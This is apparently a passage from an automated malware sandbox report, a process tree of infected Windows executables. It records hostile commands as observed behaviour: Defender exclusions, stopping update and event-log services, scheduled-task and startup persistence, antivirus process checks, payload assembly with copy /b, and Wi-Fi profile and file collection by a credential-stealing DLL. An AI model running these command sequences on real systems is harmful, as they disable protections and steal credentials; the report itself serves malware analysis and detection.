                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2064 -s 1020
                                                      5⤵
                                                      • Program crash
                                                      PID:5232
                                                  • C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
                                                    C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetWindowsHookEx
                                                    PID:5488
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
                                                      5⤵
                                                        PID:5992
                                                        • C:\Windows\SysWOW64\chcp.com
                                                          chcp 1251
                                                          6⤵
                                                            PID:3560
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
                                                            6⤵
                                                            • DcRat
                                                            • Creates scheduled task(s)
                                                            PID:652
                                                    • C:\Users\Admin\Pictures\Dg5JITRiu73KmlTOTIZVk9xg.exe
                                                      "C:\Users\Admin\Pictures\Dg5JITRiu73KmlTOTIZVk9xg.exe"
                                                      3⤵
                                                      • Executes dropped EXE
                                                      PID:5000
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -nologo -noprofile
                                                        4⤵
                                                          PID:3060
                                                        • C:\Users\Admin\Pictures\Dg5JITRiu73KmlTOTIZVk9xg.exe
                                                          "C:\Users\Admin\Pictures\Dg5JITRiu73KmlTOTIZVk9xg.exe"
                                                          4⤵
                                                          • Executes dropped EXE
                                                          PID:1996
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -nologo -noprofile
                                                            5⤵
                                                            • Modifies data under HKEY_USERS
                                                            PID:1168
                                                      • C:\Users\Admin\Pictures\q4oVVOJYlJSTjyE4pBQQcwUd.exe
                                                        "C:\Users\Admin\Pictures\q4oVVOJYlJSTjyE4pBQQcwUd.exe"
                                                        3⤵
                                                        • Executes dropped EXE
                                                        • Checks SCSI registry key(s)
                                                        • Suspicious behavior: MapViewOfSection
                                                        PID:3148
                                                      • C:\Users\Admin\Pictures\SvBLsShwKaL8PBWdxkM39f0T.exe
                                                        "C:\Users\Admin\Pictures\SvBLsShwKaL8PBWdxkM39f0T.exe"
                                                        3⤵
                                                        • Drops file in Drivers directory
                                                        • Executes dropped EXE
                                                        • Drops file in System32 directory
                                                        PID:3052
                                                        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                          C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                          4⤵
                                                            PID:5384
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                            4⤵
                                                              PID:5428
                                                              • C:\Windows\system32\wusa.exe
                                                                wusa /uninstall /kb:890830 /quiet /norestart
                                                                5⤵
                                                                  PID:3496
                                                              • C:\Windows\system32\sc.exe
                                                                C:\Windows\system32\sc.exe stop UsoSvc
                                                                4⤵
                                                                • Launches sc.exe
                                                                PID:4736
                                                              • C:\Windows\system32\sc.exe
                                                                C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                4⤵
                                                                • Launches sc.exe
                                                                PID:1220
                                                              • C:\Windows\system32\sc.exe
                                                                C:\Windows\system32\sc.exe stop wuauserv
                                                                4⤵
                                                                • Launches sc.exe
                                                                PID:3944
                                                              • C:\Windows\system32\sc.exe
                                                                C:\Windows\system32\sc.exe stop bits
                                                                4⤵
                                                                • Launches sc.exe
                                                                PID:2064
                                                              • C:\Windows\system32\sc.exe
                                                                C:\Windows\system32\sc.exe stop dosvc
                                                                4⤵
                                                                • Launches sc.exe
                                                                PID:6124
                                                              • C:\Windows\system32\powercfg.exe
                                                                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                4⤵
                                                                  PID:2960
                                                                • C:\Windows\system32\powercfg.exe
                                                                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                  4⤵
                                                                    PID:2900
                                                                  • C:\Windows\system32\powercfg.exe
                                                                    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                    4⤵
                                                                      PID:1812
                                                                    • C:\Windows\system32\powercfg.exe
                                                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                      4⤵
                                                                        PID:5472
                                                                      • C:\Windows\system32\sc.exe
                                                                        C:\Windows\system32\sc.exe stop eventlog
                                                                        4⤵
                                                                        • Launches sc.exe
                                                                        PID:2336
                                                                      • C:\Windows\system32\sc.exe
                                                                        C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
                                                                        4⤵
                                                                        • Launches sc.exe
                                                                        PID:5860
                                                                    • C:\Users\Admin\Pictures\Z5Pwcmkmjtj7jGqzkWXixJVL.exe
                                                                      "C:\Users\Admin\Pictures\Z5Pwcmkmjtj7jGqzkWXixJVL.exe" --silent --allusers=0
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      • Enumerates connected drives
                                                                      PID:2108
                                                                      • C:\Users\Admin\Pictures\Z5Pwcmkmjtj7jGqzkWXixJVL.exe
                                                                        C:\Users\Admin\Pictures\Z5Pwcmkmjtj7jGqzkWXixJVL.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x2fc,0x300,0x304,0x2d8,0x308,0x6c9a21c8,0x6c9a21d4,0x6c9a21e0
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        PID:6108
                                                                      • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\Z5Pwcmkmjtj7jGqzkWXixJVL.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\Z5Pwcmkmjtj7jGqzkWXixJVL.exe" --version
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        PID:3400
                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
                                                                    2⤵
                                                                      PID:5736
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=3908 --field-trial-handle=2280,i,4114443225282860369,4764091921472631035,262144 --variations-seed-version /prefetch:3
                                                                    1⤵
                                                                      PID:4156
                                                                    • C:\ProgramData\Google\Chrome\updater.exe
                                                                      C:\ProgramData\Google\Chrome\updater.exe
                                                                      1⤵
                                                                      • Drops file in Drivers directory
                                                                      • Executes dropped EXE
                                                                      • Drops file in System32 directory
                                                                      • Suspicious use of SetThreadContext
                                                                      PID:536
                                                                      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                        2⤵
                                                                        • Drops file in System32 directory
                                                                        • Modifies data under HKEY_USERS
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:5396
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                        2⤵
                                                                          PID:5348
                                                                          • C:\Windows\system32\wusa.exe
                                                                            wusa /uninstall /kb:890830 /quiet /norestart
                                                                            3⤵
                                                                              PID:5620
                                                                          • C:\Windows\system32\sc.exe
                                                                            C:\Windows\system32\sc.exe stop UsoSvc
                                                                            2⤵
                                                                            • Launches sc.exe
                                                                            PID:5492
                                                                          • C:\Windows\system32\sc.exe
                                                                            C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                            2⤵
                                                                            • Launches sc.exe
                                                                            PID:3832
                                                                          • C:\Windows\system32\sc.exe
                                                                            C:\Windows\system32\sc.exe stop wuauserv
                                                                            2⤵
                                                                            • Launches sc.exe
                                                                            PID:5076
                                                                          • C:\Windows\system32\sc.exe
                                                                            C:\Windows\system32\sc.exe stop bits
                                                                            2⤵
                                                                            • Launches sc.exe
                                                                            PID:5600
                                                                          • C:\Windows\system32\sc.exe
                                                                            C:\Windows\system32\sc.exe stop dosvc
                                                                            2⤵
                                                                            • Launches sc.exe
                                                                            PID:5788
                                                                          • C:\Windows\system32\powercfg.exe
                                                                            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                            2⤵
                                                                              PID:3912
                                                                            • C:\Windows\system32\powercfg.exe
                                                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                              2⤵
                                                                                PID:1168
                                                                              • C:\Windows\system32\powercfg.exe
                                                                                C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                2⤵
                                                                                  PID:844
                                                                                • C:\Windows\system32\powercfg.exe
                                                                                  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                  2⤵
                                                                                    PID:2712
                                                                                  • C:\Windows\system32\conhost.exe
                                                                                    C:\Windows\system32\conhost.exe
                                                                                    2⤵
                                                                                      PID:508
                                                                                    • C:\Windows\explorer.exe
                                                                                      explorer.exe
                                                                                      2⤵
                                                                                        PID:3008
                                                                                    • C:\Windows\system32\mmc.exe
                                                                                      "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /s
                                                                                      1⤵
                                                                                      • Drops file in System32 directory
                                                                                      • Suspicious behavior: GetForegroundWindowSpam
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      PID:4688
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\85CB.bat" "
                                                                                      1⤵
                                                                                        PID:5788
                                                                                        • C:\Windows\system32\reg.exe
                                                                                          reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
                                                                                          2⤵
                                                                                            PID:4060
                                                                                        • C:\Users\Admin\AppData\Local\Temp\DD14.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\DD14.exe
                                                                                          1⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:3404
                                                                                          • C:\Users\Admin\AppData\Local\Temp\DD14.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\DD14.exe
                                                                                            2⤵
                                                                                            • Checks computer location settings
                                                                                            • Executes dropped EXE
                                                                                            • Adds Run key to start application
                                                                                            PID:2712
                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                              icacls "C:\Users\Admin\AppData\Local\0e5d7f2d-6754-4be0-b473-73a35806b01c" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                              3⤵
                                                                                              • Modifies file permissions
                                                                                              PID:336
                                                                                            • C:\Users\Admin\AppData\Local\Temp\DD14.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\DD14.exe" --Admin IsNotAutoStart IsNotTask
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of SetThreadContext
                                                                                              PID:5992
                                                                                              • C:\Users\Admin\AppData\Local\Temp\DD14.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\DD14.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                4⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:5392
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5392 -s 572
                                                                                                  5⤵
                                                                                                  • Program crash
                                                                                                  PID:536
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5388 -ip 5388
                                                                                          1⤵
                                                                                            PID:4564
                                                                                          • C:\Users\Admin\AppData\Local\Temp\8F7.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\8F7.exe
                                                                                            1⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetThreadContext
                                                                                            PID:3352
                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                              2⤵
                                                                                                PID:2348
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5392 -ip 5392
                                                                                              1⤵
                                                                                                PID:6052
                                                                                              • C:\Users\Admin\AppData\Roaming\cwvffbi
                                                                                                C:\Users\Admin\AppData\Roaming\cwvffbi
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                • Checks SCSI registry key(s)
                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                PID:5488
                                                                                              • C:\Windows\windefender.exe
                                                                                                C:\Windows\windefender.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:5880
                                                                                              • C:\Users\Admin\AppData\Local\Temp\B159.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\B159.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:5476
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B64C.bat" "
                                                                                                1⤵
                                                                                                  PID:5524
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
                                                                                                    2⤵
                                                                                                      PID:5720
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\EE16.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\EE16.exe
                                                                                                    1⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    PID:3852
                                                                                                    • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                      C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                      2⤵
                                                                                                        PID:4764
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7FD3.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\7FD3.exe
                                                                                                      1⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:3924
                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
                                                                                                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
                                                                                                        2⤵
                                                                                                          PID:5028
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 2064 -ip 2064
                                                                                                        1⤵
                                                                                                          PID:436
                                                                                                        • C:\ProgramData\Google\Chrome\updater.exe
                                                                                                          C:\ProgramData\Google\Chrome\updater.exe
                                                                                                          1⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:6064
                                                                                                          • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                            2⤵
                                                                                                            • Modifies data under HKEY_USERS
                                                                                                            PID:3444
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                            2⤵
                                                                                                              PID:1092
                                                                                                              • C:\Windows\system32\wusa.exe
                                                                                                                wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                3⤵
                                                                                                                  PID:5700
                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                2⤵
                                                                                                                • Launches sc.exe
                                                                                                                PID:5400
                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                2⤵
                                                                                                                • Launches sc.exe
                                                                                                                PID:3112
                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                2⤵
                                                                                                                • Launches sc.exe
                                                                                                                PID:2364
                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                C:\Windows\system32\sc.exe stop bits
                                                                                                                2⤵
                                                                                                                • Launches sc.exe
                                                                                                                PID:2072
                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                C:\Windows\system32\sc.exe stop dosvc
                                                                                                                2⤵
                                                                                                                • Launches sc.exe
                                                                                                                PID:4032
                                                                                                              • C:\Windows\system32\powercfg.exe
                                                                                                                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                2⤵
                                                                                                                  PID:4024
                                                                                                                • C:\Windows\system32\powercfg.exe
                                                                                                                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                  2⤵
                                                                                                                    PID:3660
                                                                                                                  • C:\Windows\system32\powercfg.exe
                                                                                                                    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                    2⤵
                                                                                                                      PID:2172
                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                      2⤵
                                                                                                                        PID:2064
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\58E.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\58E.exe
                                                                                                                      1⤵
                                                                                                                        PID:5036
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /k move Jeffrey Jeffrey.bat & Jeffrey.bat & exit
                                                                                                                          2⤵
                                                                                                                            PID:6008
                                                                                                                            • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                              tasklist
                                                                                                                              3⤵
                                                                                                                              • Enumerates processes with tasklist
                                                                                                                              PID:3560
                                                                                                                            • C:\Windows\SysWOW64\findstr.exe
                                                                                                                              findstr /I "wrsa.exe opssvc.exe"
                                                                                                                              3⤵
                                                                                                                                PID:4436
                                                                                                                              • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                tasklist
                                                                                                                                3⤵
                                                                                                                                • Enumerates processes with tasklist
                                                                                                                                PID:640
                                                                                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
                                                                                                                                3⤵
                                                                                                                                  PID:4956
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  cmd /c md 8484
                                                                                                                                  3⤵
                                                                                                                                    PID:3760
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    cmd /c copy /b Sitemap + Sublimedirectory + Cow + Rss + Josh 8484\Http.pif
                                                                                                                                    3⤵
                                                                                                                                      PID:2444
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      cmd /c copy /b Cdt + Thumbnail + Powers + Tamil + Capabilities + Novel + Cos + Breach + Canal + Hobby + Debut + Patricia + Neural + Translations + Fist + Able + Warner + Shapes + Ancient + Plans + Greg + Go + Drain + Mpeg + Necessary + Robertson + Islam + Generations + Trim + Around + Companion + Maiden + Kills + Eat + Brunswick + Ww + Determines + Login + Heads + Wv + Vampire + Consequence + Tba 8484\F
                                                                                                                                      3⤵
                                                                                                                                        PID:3744
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\8484\Http.pif
                                                                                                                                        8484\Http.pif 8484\F
                                                                                                                                        3⤵
                                                                                                                                          PID:1220
                                                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                          ping -n 5 127.0.0.1
                                                                                                                                          3⤵
                                                                                                                                          • Runs ping.exe
                                                                                                                                          PID:5700
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1510.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\1510.exe
                                                                                                                                      1⤵
                                                                                                                                        PID:3040
                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                          2⤵
                                                                                                                                            PID:5396
                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4132 --field-trial-handle=2280,i,4114443225282860369,4764091921472631035,262144 --variations-seed-version /prefetch:8
                                                                                                                                          1⤵
                                                                                                                                            PID:532
                                                                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                            cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CodeForge.url" & echo URL="C:\Users\Admin\AppData\Local\ByteCraft Systems\CodeForge.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CodeForge.url" & exit
                                                                                                                                            1⤵
                                                                                                                                              PID:1808
                                                                                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                              cmd /c schtasks.exe /create /tn "Tex" /tr "wscript 'C:\Users\Admin\AppData\Local\ByteCraft Systems\CodeForge.js'" /sc minute /mo 3 /F
                                                                                                                                              1⤵
                                                                                                                                                PID:4312
                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                  schtasks.exe /create /tn "Tex" /tr "wscript 'C:\Users\Admin\AppData\Local\ByteCraft Systems\CodeForge.js'" /sc minute /mo 3 /F
                                                                                                                                                  2⤵
                                                                                                                                                  • DcRat
                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                  PID:2420
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\4E32.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\4E32.exe
                                                                                                                                                1⤵
                                                                                                                                                  PID:1752
                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
                                                                                                                                                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
                                                                                                                                                    2⤵
                                                                                                                                                      PID:3268
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\C95E.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\C95E.exe
                                                                                                                                                    1⤵
                                                                                                                                                      PID:3280
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe"
                                                                                                                                                      1⤵
                                                                                                                                                        PID:1604
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x284,0x288,0x28c,0x260,0x290,0x1000040,0x100004c,0x1000058
                                                                                                                                                          2⤵
                                                                                                                                                            PID:3984
                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                          explorer.exe
                                                                                                                                                          1⤵
                                                                                                                                                            PID:5480
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                                                                                            1⤵
                                                                                                                                                              PID:2420
                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:6032
                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:1268
                                                                                                                                                                      • C:\Windows\system32\netsh.exe
                                                                                                                                                                        netsh wlan show profiles
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:5136
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\808065738166_Desktop.zip' -CompressionLevel Optimal
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:4248
                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:2764
                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:4304
                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:4444
                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                            explorer.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:1712
                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:4256
                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                explorer.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:4652
                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:4080
                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                    explorer.exe
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:5580
                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:3944
                                                                                                                                                                                      • C:\Windows\system32\wscript.EXE
                                                                                                                                                                                        C:\Windows\system32\wscript.EXE "C:\Users\Admin\AppData\Local\ByteCraft Systems\CodeForge.js"
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:4240
                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                          explorer.exe
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:5448
                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                            1⤵
